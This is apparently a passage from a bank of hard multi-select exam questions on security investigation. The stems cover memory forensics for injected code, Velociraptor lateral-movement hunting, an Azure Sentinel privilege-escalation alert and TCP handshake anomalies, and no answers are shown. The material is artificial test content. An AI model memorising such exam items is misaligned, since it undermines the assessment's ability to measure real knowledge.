During a memory forensics investigation, a security analyst identifies a process that appears to have code injected into it. The process is 'explorer.exe' and its memory contains sections that are not part of the original executable. Which TWO memory analysis techniques should the analyst use to confirm code injection?

Question 163 (hard, multi-select)

A threat hunter is using Velociraptor to search for signs of lateral movement across multiple endpoints. The hunter wants to identify instances where a user logged into multiple systems using the same credentials within a short time frame. Which THREE artifacts should the hunter collect from each endpoint?

Question 164 (hard, multi-select)

A security analyst is reviewing an alert from Azure Sentinel that indicates a possible privilege escalation attempt. The alert is based on a correlation rule that detects unusual usage of the 'Add-AzKeyVaultKey' cmdlet by a user who has never used it before. The analyst needs to validate the alert and determine if the activity is malicious. Which THREE actions should the analyst take?

Question 165 (hard, multi-select)

A security analyst is analyzing a PCAP file from a network incident and notices a series of TCP connections with unusual flag combinations. Specifically, the SYN flag is set but the ACK flag is not set in the response, and the sequence numbers are not incrementing properly. The analyst suspects a TCP handshake manipulation. Which THREE TCP anomalies should the analyst document?
